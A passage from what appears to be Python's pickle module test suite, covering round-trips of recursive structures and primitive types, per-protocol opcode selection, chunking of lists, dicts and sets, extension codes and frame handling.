for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(list(y), [1])
self.assertIsInstance(y[1], tuple)
self.assertEqual(len(y[1]), 1)
self.assertIs(y[1][0], x)
def test_recursive_tuple_and_dict(self):
self._test_recursive_tuple_and_dict(dict)
def test_recursive_tuple_and_dict_subclass(self):
self._test_recursive_tuple_and_dict(MyDict, minprotocol=2)
def test_recursive_tuple_and_dict_like(self):
self._test_recursive_tuple_and_dict(REX_seven, asdict=lambda x: x.table)
def _test_recursive_dict_key(self, cls, asdict=identity, minprotocol=0):
# Dict containing an immutable object (as key) containing the original
# dict.
d = cls()
d[K(d)] = 1
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(len(y.keys()), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value, x)
def test_recursive_dict_key(self):
self._test_recursive_dict_key(dict)
def test_recursive_dict_subclass_key(self):
self._test_recursive_dict_key(MyDict, minprotocol=2)
def test_recursive_dict_like_key(self):
self._test_recursive_dict_key(REX_seven, asdict=lambda x: x.table)
def _test_recursive_tuple_and_dict_key(self, cls, asdict=identity, minprotocol=0):
# Tuple containing a dict containing an immutable object (as key)
# containing the original tuple.
t = (cls(),)
t[0][K(t)] = 1
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], cls)
y = asdict(x[0])
self.assertEqual(len(y), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value, x)
# Dict containing an immutable object (as key) containing a tuple
# containing the original dict.
t, = t
for proto in range(minprotocol, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, cls)
y = asdict(x)
self.assertEqual(len(y), 1)
self.assertIsInstance(list(y.keys())[0], K)
self.assertIs(list(y.keys())[0].value[0], x)
def test_recursive_tuple_and_dict_key(self):
self._test_recursive_tuple_and_dict_key(dict)
def test_recursive_tuple_and_dict_subclass_key(self):
self._test_recursive_tuple_and_dict_key(MyDict, minprotocol=2)
def test_recursive_tuple_and_dict_like_key(self):
self._test_recursive_tuple_and_dict_key(REX_seven, asdict=lambda x: x.table)
def test_recursive_set(self):
# Set containing an immutable object containing the original set.
y = set()
y.add(K(y))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, set)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], K)
self.assertIs(list(x)[0].value, x)
# Immutable object containing a set containing the original object.
y, = y
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, K)
self.assertIsInstance(x.value, set)
self.assertEqual(len(x.value), 1)
self.assertIs(list(x.value)[0], x)
def test_recursive_inst(self):
# Mutable object containing itself.
i = Object()
i.attr = i
for proto in protocols:
s = self.dumps(i, proto)
x = self.loads(s)
self.assertIsInstance(x, Object)
self.assertEqual(dir(x), dir(i))
self.assertIs(x.attr, x)
def test_recursive_multi(self):
l = []
d = {1:l}
i = Object()
i.attr = d
l.append(i)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertIs(x[0].attr[1], x)
def _test_recursive_collection_and_inst(self, factory):
# Mutable object containing a collection containing the original
# object.
o = Object()
o.attr = factory([o])
t = type(o.attr)
for proto in protocols:
s = self.dumps(o, proto)
x = self.loads(s)
self.assertIsInstance(x.attr, t)
self.assertEqual(len(x.attr), 1)
self.assertIsInstance(list(x.attr)[0], Object)
self.assertIs(list(x.attr)[0], x)
# Collection containing a mutable object containing the original
# collection.
o = o.attr
for proto in protocols:
s = self.dumps(o, proto)
x = self.loads(s)
self.assertIsInstance(x, t)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], Object)
self.assertIs(list(x)[0].attr, x)
def test_recursive_list_and_inst(self):
self._test_recursive_collection_and_inst(list)
def test_recursive_tuple_and_inst(self):
self._test_recursive_collection_and_inst(tuple)
def test_recursive_dict_and_inst(self):
self._test_recursive_collection_and_inst(dict.fromkeys)
def test_recursive_set_and_inst(self):
self._test_recursive_collection_and_inst(set)
def test_recursive_frozenset_and_inst(self):
self._test_recursive_collection_and_inst(frozenset)
def test_recursive_list_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyList)
def test_recursive_tuple_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyTuple)
def test_recursive_dict_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyDict.fromkeys)
def test_recursive_set_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MySet)
def test_recursive_frozenset_subclass_and_inst(self):
self._test_recursive_collection_and_inst(MyFrozenSet)
def test_recursive_inst_state(self):
# Mutable object containing itself.
y = REX_state()
y.state = y
for proto in protocols:
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, REX_state)
self.assertIs(x.state, x)
def test_recursive_tuple_and_inst_state(self):
# Tuple containing a mutable object containing the original tuple.
t = (REX_state(),)
t[0].state = t
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], REX_state)
self.assertIs(x[0].state, x)
# Mutable object containing a tuple containing the object.
t, = t
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, REX_state)
self.assertIsInstance(x.state, tuple)
self.assertEqual(len(x.state), 1)
self.assertIs(x.state[0], x)
def test_unicode(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>',
# surrogates
'<\udc80>']
for proto in protocols:
for u in endcases:
p = self.dumps(u, proto)
u2 = self.loads(p)
self.assert_is_copy(u, u2)
def test_unicode_high_plane(self):
t = '\U00012345'
for proto in protocols:
p = self.dumps(t, proto)
t2 = self.loads(p)
self.assert_is_copy(t, t2)
def test_bytes(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i, i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
def test_bytearray(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
b = bytearray(s)
p = self.dumps(b, proto)
bb = self.loads(p)
self.assertIsNot(bb, b)
self.assert_is_copy(b, bb)
if proto <= 3:
# bytearray is serialized using a global reference
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.GLOBAL, p))
elif proto == 4:
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.STACK_GLOBAL, p))
elif proto == 5:
self.assertNotIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.BYTEARRAY8, p))
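    # Sketch (not a test) of the protocol-dependent encoding asserted above:
    # below protocol 5 a bytearray is rebuilt through the "bytearray" global,
    # while protocol 5 emits the dedicated BYTEARRAY8 opcode instead.
    def _bytearray_opcode_sketch(self):
        p4 = pickle.dumps(bytearray(b'xyz'), 4)
        p5 = pickle.dumps(bytearray(b'xyz'), 5)
        assert b'bytearray' in p4 and b'bytearray' not in p5
        return p4, p5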
def test_ints(self):
for proto in protocols:
n = sys.maxsize
while n:
for expected in (-n, n):
s = self.dumps(expected, proto)
n2 = self.loads(s)
self.assert_is_copy(expected, n2)
n = n >> 1
def test_long(self):
for proto in protocols:
# 256 bytes is where LONG4 begins.
for nbits in 1, 8, 8*254, 8*255, 8*256, 8*257:
nbase = 1 << nbits
for npos in nbase-1, nbase, nbase+1:
for n in npos, -npos:
pickle = self.dumps(n, proto)
got = self.loads(pickle)
self.assert_is_copy(n, got)
# Try a monster. This is quadratic-time in protos 0 & 1, so don't
# bother with those.
nbase = int("deadbeeffeedface", 16)
nbase += nbase << 1000000
for n in nbase, -nbase:
p = self.dumps(n, 2)
got = self.loads(p)
# assert_is_copy is very expensive here as it precomputes
# a failure message by computing the repr() of n and got,
# we just do the check ourselves.
self.assertIs(type(got), int)
self.assertEqual(n, got)
def test_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assert_is_copy(value, got)
@run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_float_format(self):
        # make sure that floats are formatted locale-independently with proto 0
self.assertEqual(self.dumps(1.2, 0)[0:3], b'F1.')
def test_reduce(self):
for proto in protocols:
inst = AAA()
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assertEqual(loaded, REDUCE_A)
def test_getinitargs(self):
for proto in protocols:
inst = initarg(1, 2)
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assert_is_copy(inst, loaded)
def test_metaclass(self):
a = use_metaclass()
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a.__class__, b.__class__)
def test_dynamic_class(self):
a = create_dynamic_class("my_dynamic_class", (object,))
copyreg.pickle(pickling_metaclass, pickling_metaclass.__reduce__)
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a, b)
self.assertIs(type(a), type(b))
def test_structseq(self):
import time
import os
t = time.localtime()
for proto in protocols:
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
t = os.stat(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
def test_ellipsis(self):
for proto in protocols:
s = self.dumps(..., proto)
u = self.loads(s)
self.assertIs(..., u)
def test_notimplemented(self):
for proto in protocols:
s = self.dumps(NotImplemented, proto)
u = self.loads(s)
self.assertIs(NotImplemented, u)
def test_singleton_types(self):
# Issue #6477: Test that types of built-in singletons can be pickled.
singletons = [None, ..., NotImplemented]
for singleton in singletons:
for proto in protocols:
s = self.dumps(type(singleton), proto)
u = self.loads(s)
self.assertIs(type(singleton), u)
# Tests for protocol 2
def test_proto(self):
for proto in protocols:
pickled = self.dumps(None, proto)
if proto >= 2:
proto_header = pickle.PROTO + bytes([proto])
self.assertTrue(pickled.startswith(proto_header))
else:
self.assertEqual(count_opcode(pickle.PROTO, pickled), 0)
oob = protocols[-1] + 1 # a future protocol
build_none = pickle.NONE + pickle.STOP
badpickle = pickle.PROTO + bytes([oob]) + build_none
try:
self.loads(badpickle)
except ValueError as err:
self.assertIn("unsupported pickle protocol", str(err))
else:
self.fail("expected bad protocol number to raise ValueError")
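    # Sketch (not a test): the header checked above is simply the PROTO
    # opcode (0x80) followed by a one-byte protocol number.
    def _proto_header_sketch(self):
        assert pickle.dumps(None, 2)[:2] == b'\x80\x02'
        assert pickle.dumps(None, 5)[:2] == b'\x80\x05'
        return pickle.dumps(None, 5)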
def test_long1(self):
x = 12345678910111213141516178920
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG1, s), proto >= 2)
def test_long4(self):
x = 12345678910111213141516178920 << (256*8)
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG4, s), proto >= 2)
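    # Sketch (not a test) of the LONG1/LONG4 cutoff mentioned above: LONG1
    # carries a one-byte length, so a 255-byte two's-complement encoding is
    # its limit and a 256-byte encoding switches to LONG4.
    def _long_opcode_boundary_sketch(self):
        small = pickle.dumps(1 << (8 * 254), 2)   # 255-byte encoding -> LONG1
        large = pickle.dumps(1 << (8 * 255), 2)   # 256-byte encoding -> LONG4
        assert opcode_in_pickle(pickle.LONG1, small)
        assert opcode_in_pickle(pickle.LONG4, large)
        return small, large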
def test_short_tuples(self):
# Map (proto, len(tuple)) to expected opcode.
expected_opcode = {(0, 0): pickle.TUPLE,
(0, 1): pickle.TUPLE,
(0, 2): pickle.TUPLE,
(0, 3): pickle.TUPLE,
(0, 4): pickle.TUPLE,
(1, 0): pickle.EMPTY_TUPLE,
(1, 1): pickle.TUPLE,
(1, 2): pickle.TUPLE,
(1, 3): pickle.TUPLE,
(1, 4): pickle.TUPLE,
(2, 0): pickle.EMPTY_TUPLE,
(2, 1): pickle.TUPLE1,
(2, 2): pickle.TUPLE2,
(2, 3): pickle.TUPLE3,
(2, 4): pickle.TUPLE,
(3, 0): pickle.EMPTY_TUPLE,
(3, 1): pickle.TUPLE1,
(3, 2): pickle.TUPLE2,
(3, 3): pickle.TUPLE3,
(3, 4): pickle.TUPLE,
}
a = ()
b = (1,)
c = (1, 2)
d = (1, 2, 3)
e = (1, 2, 3, 4)
for proto in protocols:
for x in a, b, c, d, e:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
expected = expected_opcode[min(proto, 3), len(x)]
self.assertTrue(opcode_in_pickle(expected, s))
def test_singletons(self):
# Map (proto, singleton) to expected opcode.
expected_opcode = {(0, None): pickle.NONE,
(1, None): pickle.NONE,
(2, None): pickle.NONE,
(3, None): pickle.NONE,
(0, True): pickle.INT,
(1, True): pickle.INT,
(2, True): pickle.NEWTRUE,
(3, True): pickle.NEWTRUE,
(0, False): pickle.INT,
(1, False): pickle.INT,
(2, False): pickle.NEWFALSE,
(3, False): pickle.NEWFALSE,
}
for proto in protocols:
for x in None, False, True:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertTrue(x is y, (proto, x, s, y))
expected = expected_opcode[min(proto, 3), x]
self.assertTrue(opcode_in_pickle(expected, s))
def test_newobj_tuple(self):
x = MyTuple([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_list(self):
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_generic(self):
for proto in protocols:
for C in myclasses:
B = C.__base__
x = C(C.sample)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
detail = (proto, C, B, x, y, type(y))
self.assert_is_copy(x, y) # XXX revisit
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_proxies(self):
# NEWOBJ should use the __class__ rather than the raw type
classes = myclasses[:]
# Cannot create weakproxies to these classes
for c in (MyInt, MyTuple):
classes.remove(c)
for proto in protocols:
for C in classes:
B = C.__base__
x = C(C.sample)
x.foo = 42
p = weakref.proxy(x)
s = self.dumps(p, proto)
y = self.loads(s)
self.assertEqual(type(y), type(x)) # rather than type(p)
detail = (proto, C, B, x, y, type(y))
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_overridden_new(self):
        # Test that a Python class with a C-implemented __new__ is picklable
for proto in protocols:
x = MyIntWithNew2(1)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
self.assertIs(type(y), MyIntWithNew2)
self.assertEqual(int(y), 1)
self.assertEqual(y.foo, 42)
def test_newobj_not_class(self):
# Issue 24552
global SimpleNewObj
save = SimpleNewObj
o = SimpleNewObj.__new__(SimpleNewObj)
b = self.dumps(o, 4)
try:
SimpleNewObj = 42
self.assertRaises((TypeError, pickle.UnpicklingError), self.loads, b)
finally:
SimpleNewObj = save
    # Register a type with copyreg, with extension code extcode.  Pickle
    # an object of that type.  Check that the resulting pickle uses the
    # appropriate EXT[124] opcode under proto 2, and that none appears
    # under proto 1.
def produce_global_ext(self, extcode, opcode):
e = ExtensionSaver(extcode)
try:
copyreg.add_extension(__name__, "MyList", extcode)
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
# Dump using protocol 1 for comparison.
s1 = self.dumps(x, 1)
self.assertIn(__name__.encode("utf-8"), s1)
self.assertIn(b"MyList", s1)
self.assertFalse(opcode_in_pickle(opcode, s1))
y = self.loads(s1)
self.assert_is_copy(x, y)
# Dump using protocol 2 for test.
s2 = self.dumps(x, 2)
self.assertNotIn(__name__.encode("utf-8"), s2)
self.assertNotIn(b"MyList", s2)
self.assertEqual(opcode_in_pickle(opcode, s2), True, repr(s2))
y = self.loads(s2)
self.assert_is_copy(x, y)
finally:
e.restore()
def test_global_ext1(self):
self.produce_global_ext(0x00000001, pickle.EXT1) # smallest EXT1 code
self.produce_global_ext(0x000000ff, pickle.EXT1) # largest EXT1 code
def test_global_ext2(self):
self.produce_global_ext(0x00000100, pickle.EXT2) # smallest EXT2 code
self.produce_global_ext(0x0000ffff, pickle.EXT2) # largest EXT2 code
self.produce_global_ext(0x0000abcd, pickle.EXT2) # check endianness
def test_global_ext4(self):
self.produce_global_ext(0x00010000, pickle.EXT4) # smallest EXT4 code
self.produce_global_ext(0x7fffffff, pickle.EXT4) # largest EXT4 code
self.produce_global_ext(0x12abcdef, pickle.EXT4) # check endianness
def test_list_chunking(self):
n = 10 # too small to chunk
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
self.assertEqual(num_appends, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
if proto == 0:
self.assertEqual(num_appends, 0)
else:
self.assertTrue(num_appends >= 2)
def test_dict_chunking(self):
n = 10 # too small to chunk
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
self.assertIsInstance(s, bytes_types)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
self.assertEqual(num_setitems, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
if proto == 0:
self.assertEqual(num_setitems, 0)
else:
self.assertTrue(num_setitems >= 2)
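    # Sketch (not a test): the chunking asserted above comes from the
    # pickler's internal batch size (1000 items per APPENDS/SETITEMS batch
    # in both the Python and C implementations), so 2500 keys normally
    # produce three SETITEMS opcodes at protocol 2.
    def _dict_chunk_count_sketch(self):
        s = pickle.dumps(dict.fromkeys(range(2500)), 2)
        assert count_opcode(pickle.SETITEMS, s) >= 2   # 3 with a 1000-item batch
        return s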
def test_set_chunking(self):
n = 10 # too small to chunk
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertEqual(num_additems, 1)
n = 2500 # expect at least two chunks when proto >= 4
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertGreaterEqual(num_additems, 2)
def test_simple_newobj(self):
x = SimpleNewObj.__new__(SimpleNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
else:
self.assertIn(b'M\xce\xfa', s) # BININT2
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj(self):
x = ComplexNewObj.__new__(ComplexNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj_ex(self):
x = ComplexNewObjEx.__new__(ComplexNewObjEx, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ, s))
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ_EX, s),
4 <= proto)
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_newobj_list_slots(self):
x = SlotList([1, 2, 3])
x.foo = 42
x.bar = "hello"
s = self.dumps(x, 2)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_reduce_overrides_default_reduce_ex(self):
for proto in protocols:
x = REX_one()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 0)
def test_reduce_ex_called(self):
for proto in protocols:
x = REX_two()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_overrides_reduce(self):
for proto in protocols:
x = REX_three()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_calls_base(self):
for proto in protocols:
x = REX_four()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, proto)
def test_reduce_calls_base(self):
for proto in protocols:
x = REX_five()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 1)
@no_tracing
def test_bad_getattr(self):
# Issue #3514: crash when there is an infinite loop in __getattr__
x = BadGetattr()
for proto in protocols:
self.assertRaises(RuntimeError, self.dumps, x, proto)
def test_reduce_bad_iterator(self):
# Issue4176: crash when 4th and 5th items of __reduce__()
# are not iterators
class C(object):
def __reduce__(self):
# 4th item is not an iterator
return list, (), None, [], None
class D(object):
def __reduce__(self):
# 5th item is not an iterator
return dict, (), None, None, []
# Python implementation is less strict and also accepts iterables.
for proto in protocols:
try:
self.dumps(C(), proto)
except pickle.PicklingError:
pass
try:
self.dumps(D(), proto)
except pickle.PicklingError:
pass
def test_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
for proto in protocols:
with self.subTest(proto=proto):
dumped = self.dumps(obj, proto)
loaded = self.loads(dumped)
self.assert_is_copy(obj, loaded)
def test_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
for proto in protocols:
x = C()
x.foo = 42
x.bar = "hello"
s = self.dumps(x, proto)
y = self.loads(s)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_pickle_to_2x(self):
# Pickle non-trivial data with protocol 2, expecting that it yields
# the same result as Python 2.x did.
# NOTE: this test is a bit too strong since we can produce different
# bytecode that 2.x will still understand.
dumped = self.dumps(range(5), 2)
self.assertEqual(dumped, DATA_XRANGE)
dumped = self.dumps(set([3]), 2)
self.assertEqual(dumped, DATA_SET2)
def test_large_pickles(self):
# Test the correctness of internal buffering routines when handling
# large data.
for proto in protocols:
data = (1, min, b'xy' * (30 * 1024), len)
dumped = self.dumps(data, proto)
loaded = self.loads(dumped)
self.assertEqual(len(loaded), len(data))
self.assertEqual(loaded, data)
def test_int_pickling_efficiency(self):
        # Test compactness of the int representation (see issue #12744)
for proto in protocols:
with self.subTest(proto=proto):
pickles = [self.dumps(2**n, proto) for n in range(70)]
sizes = list(map(len, pickles))
# the size function is monotonic
self.assertEqual(sorted(sizes), sizes)
if proto >= 2:
for p in pickles:
self.assertFalse(opcode_in_pickle(pickle.LONG, p))
def _check_pickling_with_opcode(self, obj, opcode, proto):
pickled = self.dumps(obj, proto)
self.assertTrue(opcode_in_pickle(opcode, pickled))
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
def test_appends_on_non_lists(self):
# Issue #17720
obj = REX_six([1, 2, 3])
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.APPEND, proto)
else:
self._check_pickling_with_opcode(obj, pickle.APPENDS, proto)
def test_setitems_on_non_dicts(self):
obj = REX_seven({1: -1, 2: -2, 3: -3})
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.SETITEM, proto)
else:
self._check_pickling_with_opcode(obj, pickle.SETITEMS, proto)
# Exercise framing (proto >= 4) for significant workloads
FRAME_SIZE_MIN = 4
FRAME_SIZE_TARGET = 64 * 1024
def check_frame_opcodes(self, pickled):
"""
Check the arguments of FRAME opcodes in a protocol 4+ pickle.
Note that binary objects that are larger than FRAME_SIZE_TARGET are not
framed by default and are therefore considered a frame by themselves in
the following consistency check.
"""
frame_end = frameless_start = None
frameless_opcodes = {'BINBYTES', 'BINUNICODE', 'BINBYTES8',
'BINUNICODE8', 'BYTEARRAY8'}
for op, arg, pos in pickletools.genops(pickled):
if frame_end is not None:
self.assertLessEqual(pos, frame_end)
if pos == frame_end:
frame_end = None
if frame_end is not None: # framed
self.assertNotEqual(op.name, 'FRAME')
if op.name in frameless_opcodes:
# Only short bytes and str objects should be written
# in a frame
self.assertLessEqual(len(arg), self.FRAME_SIZE_TARGET)
else: # not framed
if (op.name == 'FRAME' or
(op.name in frameless_opcodes and
len(arg) > self.FRAME_SIZE_TARGET)):
# Frame or large bytes or str object
if frameless_start is not None:
# Only short data should be written outside of a frame
self.assertLess(pos - frameless_start,
self.FRAME_SIZE_MIN)
frameless_start = None
elif frameless_start is None and op.name != 'PROTO':
frameless_start = pos
if op.name == 'FRAME':
self.assertGreaterEqual(arg, self.FRAME_SIZE_MIN)
frame_end = pos + 9 + arg
pos = len(pickled)
if frame_end is not None:
self.assertEqual(frame_end, pos)
elif frameless_start is not None:
self.assertLess(pos - frameless_start, self.FRAME_SIZE_MIN)
@support.skip_if_pgo_task
def test_framing_many_objects(self):
obj = list(range(10**5))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
pickled = self.dumps(obj, proto)
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
bytes_per_frame = (len(pickled) /
count_opcode(pickle.FRAME, pickled))
self.assertGreater(bytes_per_frame,
self.FRAME_SIZE_TARGET / 2)
self.assertLessEqual(bytes_per_frame,
self.FRAME_SIZE_TARGET * 1)
self.check_frame_opcodes(pickled)
def test_framing_large_objects(self):
N = 1024 * 1024
small_items = [[i] for i in range(10)]
obj = [b'x' * N, *small_items, b'y' * N, 'z' * N]
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
for fast in [False, True]:
with self.subTest(proto=proto, fast=fast):
if not fast:
# fast=False by default.
# This covers in-memory pickling with pickle.dumps().
pickled = self.dumps(obj, proto)
else:
# Pickler is required when fast=True.
if not hasattr(self, 'pickler'):
continue
buf = io.BytesIO()
pickler = self.pickler(buf, protocol=proto)
pickler.fast = fast
pickler.dump(obj)
pickled = buf.getvalue()
unpickled = self.loads(pickled)
# More informative error message in case of failure.
self.assertEqual([len(x) for x in obj],
[len(x) for x in unpickled])
# Perform full equality check if the lengths match.
self.assertEqual(obj, unpickled)
n_frames = count_opcode(pickle.FRAME, pickled)
# A single frame for the small objects between
# the first two large objects.
self.assertEqual(n_frames, 1)
self.check_frame_opcodes(pickled)
def test_optional_frames(self):
if pickle.HIGHEST_PROTOCOL < 4:
return
def remove_frames(pickled, keep_frame=None):
"""Remove frame opcodes from the given pickle."""
frame_starts = []
# 1 byte for the opcode and 8 for the argument
frame_opcode_size = 9
for opcode, _, pos in pickletools.genops(pickled):
if opcode.name == 'FRAME':
frame_starts.append(pos)
newpickle = bytearray()
last_frame_end = 0
for i, pos in enumerate(frame_starts):
if keep_frame and keep_frame(i):
continue
newpickle += pickled[last_frame_end:pos]
last_frame_end = pos + frame_opcode_size
newpickle += pickled[last_frame_end:]
return newpickle
frame_size = self.FRAME_SIZE_TARGET
num_frames = 20
# Large byte objects (dict values) interleaved with small objects
# (dict keys)
